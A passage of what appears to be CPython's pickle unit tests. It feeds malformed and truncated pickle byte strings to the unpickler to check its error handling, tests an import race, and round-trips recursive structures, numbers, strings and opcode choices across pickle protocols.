b'd', # DICT
b'e', # APPENDS
b'(e',
b'ibuiltins\nlist\n', # INST
b'l', # LIST
b'o', # OBJ
b'(o',
b'p1\n', # PUT
b'q\x00', # BINPUT
b'r\x00\x00\x00\x00', # LONG_BINPUT
b's', # SETITEM
b'Ns',
b'NNs',
b't', # TUPLE
b'u', # SETITEMS
b'(u',
b'}(Nu',
b'\x81', # NEWOBJ
b')\x81',
b'\x85', # TUPLE1
b'\x86', # TUPLE2
b'N\x86',
b'\x87', # TUPLE3
b'N\x87',
b'NN\x87',
b'\x90', # ADDITEMS
b'(\x90',
b'\x91', # FROZENSET
b'\x92', # NEWOBJ_EX
b')}\x92',
b'\x93', # STACK_GLOBAL
b'Vlist\n\x93',
b'\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_bad_mark(self):
badpickles = [
b'N(.', # STOP
b'N(2', # DUP
b'cbuiltins\nlist\n)(R', # REDUCE
b'cbuiltins\nlist\n()R',
b']N(a', # APPEND
# BUILD
b'cbuiltins\nValueError\n)R}(b',
b'cbuiltins\nValueError\n)R(}b',
b'(Nd', # DICT
b'N(p1\n', # PUT
b'N(q\x00', # BINPUT
b'N(r\x00\x00\x00\x00', # LONG_BINPUT
b'}NN(s', # SETITEM
b'}N(Ns',
b'}(NNs',
b'}((u', # SETITEMS
b'cbuiltins\nlist\n)(\x81', # NEWOBJ
b'cbuiltins\nlist\n()\x81',
b'N(\x85', # TUPLE1
b'NN(\x86', # TUPLE2
b'N(N\x86',
b'NNN(\x87', # TUPLE3
b'NN(N\x87',
b'N(NN\x87',
b']((\x90', # ADDITEMS
# NEWOBJ_EX
b'cbuiltins\nlist\n)}(\x92',
b'cbuiltins\nlist\n)(}\x92',
b'cbuiltins\nlist\n()}\x92',
# STACK_GLOBAL
b'Vbuiltins\n(Vlist\n\x93',
b'Vbuiltins\nVlist\n(\x93',
b'N(\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_truncated_data(self):
self.check_unpickling_error(EOFError, b'')
self.check_unpickling_error(EOFError, b'N')
badpickles = [
b'B', # BINBYTES
b'B\x03\x00\x00',
b'B\x03\x00\x00\x00',
b'B\x03\x00\x00\x00ab',
b'C', # SHORT_BINBYTES
b'C\x03',
b'C\x03ab',
b'F', # FLOAT
b'F0.0',
b'F0.00',
b'G', # BINFLOAT
b'G\x00\x00\x00\x00\x00\x00\x00',
b'I', # INT
b'I0',
b'J', # BININT
b'J\x00\x00\x00',
b'K', # BININT1
b'L', # LONG
b'L0',
b'L10',
b'L0L',
b'L10L',
b'M', # BININT2
b'M\x00',
# b'P', # PERSID
# b'Pabc',
b'S', # STRING
b"S'abc'",
b'T', # BINSTRING
b'T\x03\x00\x00',
b'T\x03\x00\x00\x00',
b'T\x03\x00\x00\x00ab',
b'U', # SHORT_BINSTRING
b'U\x03',
b'U\x03ab',
b'V', # UNICODE
b'Vabc',
b'X', # BINUNICODE
b'X\x03\x00\x00',
b'X\x03\x00\x00\x00',
b'X\x03\x00\x00\x00ab',
b'(c', # GLOBAL
b'(cbuiltins',
b'(cbuiltins\n',
b'(cbuiltins\nlist',
b'Ng', # GET
b'Ng0',
b'(i', # INST
b'(ibuiltins',
b'(ibuiltins\n',
b'(ibuiltins\nlist',
b'Nh', # BINGET
b'Nj', # LONG_BINGET
b'Nj\x00\x00\x00',
b'Np', # PUT
b'Np0',
b'Nq', # BINPUT
b'Nr', # LONG_BINPUT
b'Nr\x00\x00\x00',
b'\x80', # PROTO
b'\x82', # EXT1
b'\x83', # EXT2
b'\x84\x01',
b'\x84', # EXT4
b'\x84\x01\x00\x00',
b'\x8a', # LONG1
b'\x8b', # LONG4
b'\x8b\x00\x00\x00',
b'\x8c', # SHORT_BINUNICODE
b'\x8c\x03',
b'\x8c\x03ab',
b'\x8d', # BINUNICODE8
b'\x8d\x03\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x8e', # BINBYTES8
b'\x8e\x03\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x96', # BYTEARRAY8
b'\x96\x03\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x95', # FRAME
b'\x95\x02\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00N',
]
for p in badpickles:
self.check_unpickling_error(self.truncated_errors, p)
@threading_helper.reap_threads
@threading_helper.requires_working_threading()
def test_unpickle_module_race(self):
# https://bugs.python.org/issue34572
locker_module = dedent("""
import threading
barrier = threading.Barrier(2)
""")
locking_import_module = dedent("""
import locker
locker.barrier.wait()
class ToBeUnpickled(object):
pass
""")
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
with open(os.path.join(TESTFN, "locker.py"), "wb") as f:
f.write(locker_module.encode('utf-8'))
with open(os.path.join(TESTFN, "locking_import.py"), "wb") as f:
f.write(locking_import_module.encode('utf-8'))
self.addCleanup(forget, "locker")
self.addCleanup(forget, "locking_import")
import locker
pickle_bytes = (
b'\x80\x03clocking_import\nToBeUnpickled\nq\x00)\x81q\x01.')
# Then try to unpickle two of these simultaneously
# One of them will cause the module import, and we want it to block
# until the other one either:
# - fails (before the patch for this issue)
# - blocks on the import lock for the module, as it should
results = []
barrier = threading.Barrier(3)
def t():
# This ensures the threads have all started
# presumably barrier release is faster than thread startup
barrier.wait()
results.append(pickle.loads(pickle_bytes))
t1 = threading.Thread(target=t)
t2 = threading.Thread(target=t)
t1.start()
t2.start()
barrier.wait()
# could have delay here
locker.barrier.wait()
t1.join()
t2.join()
from locking_import import ToBeUnpickled
self.assertEqual(
[type(x) for x in results],
[ToBeUnpickled] * 2)
class AbstractPickleTests:
# Subclass must define self.dumps, self.loads.
optimized = False
_testdata = AbstractUnpickleTests._testdata
def setUp(self):
pass
assert_is_copy = AbstractUnpickleTests.assert_is_copy
def test_misc(self):
# test various datatypes not tested by testdata
for proto in protocols:
x = myint(4)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = (1, ())
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = initarg(1, x)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
# XXX test __reduce__ protocol?
def test_roundtrip_equality(self):
expected = self._testdata
for proto in protocols:
s = self.dumps(expected, proto)
got = self.loads(s)
self.assert_is_copy(expected, got)
# There are gratuitous differences between pickles produced by
# pickle and cPickle, largely because cPickle starts PUT indices at
# 1 and pickle starts them at 0. See XXX comment in cPickle's put2() --
# there's a comment with an exclamation point there whose meaning
# is a mystery. cPickle also suppresses PUT for objects with a refcount
# of 1.
def dont_test_disassembly(self):
from io import StringIO
from pickletools import dis
for proto, expected in (0, DATA0_DIS), (1, DATA1_DIS):
s = self.dumps(self._testdata, proto)
filelike = StringIO()
dis(s, out=filelike)
got = filelike.getvalue()
self.assertEqual(expected, got)
def _test_recursive_list(self, cls, aslist=identity, minprotocol=0):
# List containing itself.
l = cls()
l.append(l)
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = aslist(x)
self.assertEqual(len(y), 1)
self.assertIs(y[0], x)
def test_recursive_list(self):
self._test_recursive_list(list)
def test_recursive_list_subclass(self):
self._test_recursive_list(MyList, minprotocol=2)
def test_recursive_list_like(self):
self._test_recursive_list(REX_six, aslist=lambda x: x.items)
def _test_recursive_tuple_and_list(self, cls, aslist=identity, minprotocol=0):
# Tuple containing a list containing the original tuple.
t = (cls(),)
t[0].append(t)
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], cls)
y = aslist(x[0])
self.assertEqual(len(y), 1)
self.assertIs(y[0], x)
# List containing a tuple containing the original list.
t, = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = aslist(x)
self.assertEqual(len(y), 1)
self.assertIsInstance(y[0], tuple)
self.assertEqual(len(y[0]), 1)
self.assertIs(y[0][0], x)
def test_recursive_tuple_and_list(self):
self._test_recursive_tuple_and_list(list)
def test_recursive_tuple_and_list_subclass(self):
self._test_recursive_tuple_and_list(MyList, minprotocol=2)
def test_recursive_tuple_and_list_like(self):
self._test_recursive_tuple_and_list(REX_six, aslist=lambda x: x.items)
def _test_recursive_dict(self, cls, asdict=identity, minprotocol=0):
# Dict containing itself.
d = cls()
d[1] = d
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(list(y.keys()), [1])
self.assertIs(y[1], x)
def test_recursive_dict(self):
self._test_recursive_dict(dict)
def test_recursive_dict_subclass(self):
self._test_recursive_dict(MyDict, minprotocol=2)
def test_recursive_dict_like(self):
self._test_recursive_dict(REX_seven, asdict=lambda x: x.table)
def _test_recursive_tuple_and_dict(self, cls, asdict=identity, minprotocol=0):
# Tuple containing a dict containing the original tuple.
t = (cls(),)
t[0][1] = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], cls)
y = asdict(x[0])
self.assertEqual(list(y), [1])
self.assertIs(y[1], x)
# Dict containing a tuple containing the original dict.
t, = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(list(y), [1])
self.assertIsInstance(y[1], tuple)
self.assertEqual(len(y[1]), 1)
self.assertIs(y[1][0], x)
def test_recursive_tuple_and_dict(self):
self._test_recursive_tuple_and_dict(dict)
def test_recursive_tuple_and_dict_subclass(self):
self._test_recursive_tuple_and_dict(MyDict, minprotocol=2)
def test_recursive_tuple_and_dict_like(self):
self._test_recursive_tuple_and_dict(REX_seven, asdict=lambda x: x.table)
def _test_recursive_dict_key(self, cls, asdict=identity, minprotocol=0):
# Dict containing an immutable object (as key) containing the original
# dict.
d = cls()
d[K(d)] = 1
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(len(y.keys()), 1)
self.assertIsInstance(list(y.keys())[0], K)
self.assertIs(list(y.keys())[0].value, x)
def test_recursive_dict_key(self):
self._test_recursive_dict_key(dict)
def test_recursive_dict_subclass_key(self):
self._test_recursive_dict_key(MyDict, minprotocol=2)
def test_recursive_dict_like_key(self):
self._test_recursive_dict_key(REX_seven, asdict=lambda x: x.table)
def _test_recursive_tuple_and_dict_key(self, cls, asdict=identity, minprotocol=0):
# Tuple containing a dict containing an immutable object (as key)
# containing the original tuple.
t = (cls(),)
t[0][K(t)] = 1
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], cls)
y = asdict(x[0])
self.assertEqual(len(y), 1)
self.assertIsInstance(list(y.keys())[0], K)
self.assertIs(list(y.keys())[0].value, x)
# Dict containing an immutable object (as key) containing a tuple
# containing the original dict.
t, = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(len(y), 1)
self.assertIsInstance(list(y.keys())[0], K)
self.assertIs(list(y.keys())[0].value[0], x)
def test_recursive_tuple_and_dict_key(self):
self._test_recursive_tuple_and_dict_key(dict)
def test_recursive_tuple_and_dict_subclass_key(self):
self._test_recursive_tuple_and_dict_key(MyDict, minprotocol=2)
def test_recursive_tuple_and_dict_like_key(self):
self._test_recursive_tuple_and_dict_key(REX_seven, asdict=lambda x: x.table)
def test_recursive_set(self):
# Set containing an immutable object containing the original set.
y = set()
y.add(K(y))
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, set)
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], K)
self.assertIs(list(x)[0].value, x)
# Immutable object containing a set containing the original object.
y, = y
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, K)
self.assertIsInstance(x.value, set)
self.assertEqual(len(x.value), 1)
self.assertIs(list(x.value)[0], x)
def test_recursive_inst(self):
# Mutable object containing itself.
i = Object()
i.attr = i
for proto in protocols:
s = self.dumps(i, proto)
x = self.loads(s)
self.assertIsInstance(x, Object)
self.assertEqual(dir(x), dir(i))
self.assertIs(x.attr, x)
def test_recursive_multi(self):
l = []
d = {1:l}
i = Object()
i.attr = d
l.append(i)
for proto in protocols:
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, list)
self.assertEqual(len(x), 1)
self.assertEqual(dir(x[0]), dir(i))
self.assertEqual(list(x[0].attr.keys()), [1])
self.assertIs(x[0].attr[1], x)
def _test_recursive_collection_and_inst(self, factory):
# Mutable object containing a collection containing the original
# object.
o = Object()
o.attr = factory([o])
t = type(o.attr)
for proto in protocols:
s = self.dumps(o, proto)
x = self.loads(s)
self.assertIsInstance(x.attr, t)
self.assertEqual(len(x.attr), 1)
self.assertIsInstance(list(x.attr)[0], Object)
self.assertIs(list(x.attr)[0], x)
# Collection containing a mutable object containing the original
# collection.
o = o.attr
for proto in protocols:
s = self.dumps(o, proto)
x = self.loads(s)
self.assertIsInstance(x, t)
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], Object)
self.assertIs(list(x)[0].attr, x)
def test_recursive_list_and_inst(self):
self._test_recursive_collection_and_inst(list)
def test_recursive_tuple_and_inst(self):
self._test_recursive_collection_and_inst(tuple)
def test_recursive_dict_and_inst(self):
self._test_recursive_collection_and_inst(dict.fromkeys)
def test_recursive_set_and_inst(self):
self._test_recursive_collection_and_inst(set)
def test_recursive_frozenset_and_inst(self):
self._test_recursive_collection_and_inst(frozenset)
def test_recursive_list_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyList)
def test_recursive_tuple_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyTuple)
def test_recursive_dict_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyDict.fromkeys)
def test_recursive_set_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MySet)
def test_recursive_frozenset_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyFrozenSet)
def test_recursive_inst_state(self):
# Mutable object containing itself.
y = REX_state()
y.state = y
for proto in protocols:
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, REX_state)
self.assertIs(x.state, x)
def test_recursive_tuple_and_inst_state(self):
# Tuple containing a mutable object containing the original tuple.
t = (REX_state(),)
t[0].state = t
for proto in protocols:
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], REX_state)
self.assertIs(x[0].state, x)
# Mutable object containing a tuple containing the object.
t, = t
for proto in protocols:
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, REX_state)
self.assertIsInstance(x.state, tuple)
self.assertEqual(len(x.state), 1)
self.assertIs(x.state[0], x)
def test_unicode(self):
endcases = ['', '<\\u>', '<\\\u1234>', '<\n>',
'<\\>', '<\\\U00012345>',
# surrogates
'<\udc80>']
for proto in protocols:
for u in endcases:
p = self.dumps(u, proto)
u2 = self.loads(p)
self.assert_is_copy(u, u2)
def test_unicode_high_plane(self):
t = '\U00012345'
for proto in protocols:
p = self.dumps(t, proto)
t2 = self.loads(p)
self.assert_is_copy(t, t2)
def test_bytes(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i, i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
def test_bytearray(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
b = bytearray(s)
p = self.dumps(b, proto)
bb = self.loads(p)
self.assertIsNot(bb, b)
self.assert_is_copy(b, bb)
if proto <= 3:
# bytearray is serialized using a global reference
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.GLOBAL, p))
elif proto == 4:
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.STACK_GLOBAL, p))
elif proto == 5:
self.assertNotIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.BYTEARRAY8, p))
def test_bytearray_memoization_bug(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
b = bytearray(s)
p = self.dumps((b, b), proto)
b1, b2 = self.loads(p)
self.assertIs(b1, b2)
def test_ints(self):
for proto in protocols:
n = sys.maxsize
while n:
for expected in (-n, n):
s = self.dumps(expected, proto)
n2 = self.loads(s)
self.assert_is_copy(expected, n2)
n = n >> 1
def test_long(self):
for proto in protocols:
# 256 bytes is where LONG4 begins.
for nbits in 1, 8, 8*254, 8*255, 8*256, 8*257:
nbase = 1 << nbits
for npos in nbase-1, nbase, nbase+1:
for n in npos, -npos:
pickle = self.dumps(n, proto)
got = self.loads(pickle)
self.assert_is_copy(n, got)
# Try a monster. This is quadratic-time in protos 0 & 1, so don't
# bother with those.
nbase = int("deadbeeffeedface", 16)
nbase += nbase << 1000000
for n in nbase, -nbase:
p = self.dumps(n, 2)
got = self.loads(p)
# assert_is_copy is very expensive here as it precomputes
# a failure message by computing the repr() of n and got,
# we just do the check ourselves.
self.assertIs(type(got), int)
self.assertEqual(n, got)
def test_float(self):
test_values = [0.0, 4.94e-324, 1e-310, 7e-308, 6.626e-34, 0.1, 0.5,
3.14, 263.44582062374053, 6.022e23, 1e30]
test_values = test_values + [-x for x in test_values]
for proto in protocols:
for value in test_values:
pickle = self.dumps(value, proto)
got = self.loads(pickle)
self.assert_is_copy(value, got)
@run_with_locale('LC_ALL', 'de_DE', 'fr_FR')
def test_float_format(self):
# make sure that floats are formatted locale independent with proto 0
self.assertEqual(self.dumps(1.2, 0)[0:3], b'F1.')
def test_reduce(self):
for proto in protocols:
inst = AAA()
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assertEqual(loaded, REDUCE_A)
def test_getinitargs(self):
for proto in protocols:
inst = initarg(1, 2)
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assert_is_copy(inst, loaded)
def test_metaclass(self):
a = use_metaclass()
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a.__class__, b.__class__)
def test_dynamic_class(self):
a = create_dynamic_class("my_dynamic_class", (object,))
copyreg.pickle(pickling_metaclass, pickling_metaclass.__reduce__)
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a, b)
self.assertIs(type(a), type(b))
def test_structseq(self):
import time
import os
t = time.localtime()
for proto in protocols:
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
t = os.stat(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
if hasattr(os, "statvfs"):
t = os.statvfs(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
def test_ellipsis(self):
for proto in protocols:
s = self.dumps(..., proto)
u = self.loads(s)
self.assertIs(..., u)
def test_notimplemented(self):
for proto in protocols:
s = self.dumps(NotImplemented, proto)
u = self.loads(s)
self.assertIs(NotImplemented, u)
def test_singleton_types(self):
# Issue #6477: Test that types of built-in singletons can be pickled.
singletons = [None, ..., NotImplemented]
for singleton in singletons:
for proto in protocols:
s = self.dumps(type(singleton), proto)
u = self.loads(s)
self.assertIs(type(singleton), u)
# Tests for protocol 2
def test_proto(self):
for proto in protocols:
pickled = self.dumps(None, proto)
if proto >= 2:
proto_header = pickle.PROTO + bytes([proto])
self.assertTrue(pickled.startswith(proto_header))
else:
self.assertEqual(count_opcode(pickle.PROTO, pickled), 0)
oob = protocols[-1] + 1 # a future protocol
build_none = pickle.NONE + pickle.STOP
badpickle = pickle.PROTO + bytes([oob]) + build_none
try:
self.loads(badpickle)
except ValueError as err:
self.assertIn("unsupported pickle protocol", str(err))
else:
self.fail("expected bad protocol number to raise ValueError")
def test_long1(self):
x = 12345678910111213141516178920
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG1, s), proto >= 2)
def test_long4(self):
x = 12345678910111213141516178920 << (256*8)
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG4, s), proto >= 2)
def test_short_tuples(self):
# Map (proto, len(tuple)) to expected opcode.
expected_opcode = {(0, 0): pickle.TUPLE,
(0, 1): pickle.TUPLE,
(0, 2): pickle.TUPLE,
(0, 3): pickle.TUPLE,
(0, 4): pickle.TUPLE,
(1, 0): pickle.EMPTY_TUPLE,
(1, 1): pickle.TUPLE,
(1, 2): pickle.TUPLE,
(1, 3): pickle.TUPLE,
(1, 4): pickle.TUPLE,
(2, 0): pickle.EMPTY_TUPLE,
(2, 1): pickle.TUPLE1,
(2, 2): pickle.TUPLE2,
(2, 3): pickle.TUPLE3,
(2, 4): pickle.TUPLE,
(3, 0): pickle.EMPTY_TUPLE,
(3, 1): pickle.TUPLE1,
(3, 2): pickle.TUPLE2,
(3, 3): pickle.TUPLE3,
(3, 4): pickle.TUPLE,
}
a = ()
b = (1,)
c = (1, 2)
d = (1, 2, 3)
e = (1, 2, 3, 4)
for proto in protocols:
for x in a, b, c, d, e:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
expected = expected_opcode[min(proto, 3), len(x)]
self.assertTrue(opcode_in_pickle(expected, s))
def test_singletons(self):
# Map (proto, singleton) to expected opcode.
expected_opcode = {(0, None): pickle.NONE,
(1, None): pickle.NONE,
(2, None): pickle.NONE,
(3, None): pickle.NONE,
(0, True): pickle.INT,
(1, True): pickle.INT,
(2, True): pickle.NEWTRUE,
(3, True): pickle.NEWTRUE,
(0, False): pickle.INT,
(1, False): pickle.INT,
(2, False): pickle.NEWFALSE,
(3, False): pickle.NEWFALSE,
}
for proto in protocols:
for x in None, False, True:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertTrue(x is y, (proto, x, s, y))
expected = expected_opcode[min(proto, 3), x]
self.assertTrue(opcode_in_pickle(expected, s))
def test_newobj_tuple(self):
x = MyTuple([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_list(self):
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_generic(self):
for proto in protocols:
for C in myclasses:
B = C.__base__
x = C(C.sample)
x.foo = 42
s = self.dumps(x, proto)
y = self.loads(s)
detail = (proto, C, B, x, y, type(y))
self.assert_is_copy(x, y) # XXX revisit
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_proxies(self):
# NEWOBJ should use the __class__ rather than the raw type
classes = myclasses[:]
# Cannot create weakproxies to these classes
for c in (MyInt, MyTuple):
classes.remove(c)
for proto in protocols:
for C in classes:
B = C.__base__
x = C(C.sample)
x.foo = 42
p = weakref.proxy(x)
s = self.dumps(p, proto)
y = self.loads(s)
self.assertEqual(type(y), type(x)) # rather than type(p)
detail = (proto, C, B, x, y, type(y))
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_overridden_new(self):
# Test that Python class with C implemented __new__ is pickleable
for proto in protocols:
x = MyIntWithNew2(1)
x.foo = 42
s = self.dumps(x, proto)
y = self.loads(s)
self.assertIs(type(y), MyIntWithNew2)
self.assertEqual(int(y), 1)
self.assertEqual(y.foo, 42)
def test_newobj_not_class(self):
# Issue 24552
global SimpleNewObj
save = SimpleNewObj
o = SimpleNewObj.__new__(SimpleNewObj)
b = self.dumps(o, 4)
try:
SimpleNewObj = 42
self.assertRaises((TypeError, pickle.UnpicklingError), self.loads, b)
finally:
SimpleNewObj = save
# Register a type with copyreg, with extension code extcode. Pickle
# an object of that type. Check that the resulting pickle uses opcode
# (EXT[124]) under proto 2, and not in proto 1.
def produce_global_ext(self, extcode, opcode):
e = ExtensionSaver(extcode)
try:
copyreg.add_extension(__name__, "MyList", extcode)
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
# Dump using protocol 1 for comparison.
s1 = self.dumps(x, 1)
self.assertIn(__name__.encode("utf-8"), s1)
self.assertIn(b"MyList", s1)
self.assertFalse(opcode_in_pickle(opcode, s1))
y = self.loads(s1)
self.assert_is_copy(x, y)
# Dump using protocol 2 for test.
s2 = self.dumps(x, 2)
self.assertNotIn(__name__.encode("utf-8"), s2)
self.assertNotIn(b"MyList", s2)
self.assertEqual(opcode_in_pickle(opcode, s2), True, repr(s2))
y = self.loads(s2)
self.assert_is_copy(x, y)
finally:
e.restore()
def test_global_ext1(self):
self.produce_global_ext(0x00000001, pickle.EXT1) # smallest EXT1 code
self.produce_global_ext(0x000000ff, pickle.EXT1) # largest EXT1 code
def test_global_ext2(self):
self.produce_global_ext(0x00000100, pickle.EXT2) # smallest EXT2 code
self.produce_global_ext(0x0000ffff, pickle.EXT2) # largest EXT2 code
self.produce_global_ext(0x0000abcd, pickle.EXT2) # check endianness
def test_global_ext4(self):
self.produce_global_ext(0x00010000, pickle.EXT4) # smallest EXT4 code
self.produce_global_ext(0x7fffffff, pickle.EXT4) # largest EXT4 code
self.produce_global_ext(0x12abcdef, pickle.EXT4) # check endianness
def test_list_chunking(self):
n = 10 # too small to chunk
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
self.assertEqual(num_appends, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
if proto == 0:
self.assertEqual(num_appends, 0)
else:
self.assertTrue(num_appends >= 2)
def test_dict_chunking(self):
n = 10 # too small to chunk
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
self.assertIsInstance(s, bytes_types)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
self.assertEqual(num_setitems, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
if proto == 0:
self.assertEqual(num_setitems, 0)
else:
self.assertTrue(num_setitems >= 2)
def test_set_chunking(self):
n = 10 # too small to chunk
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertEqual(num_additems, 1)
n = 2500 # expect at least two chunks when proto >= 4
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertGreaterEqual(num_additems, 2)
def test_simple_newobj(self):
x = SimpleNewObj.__new__(SimpleNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
else:
self.assertIn(b'M\xce\xfa', s) # BININT2
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj(self):
x = ComplexNewObj.__new__(ComplexNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
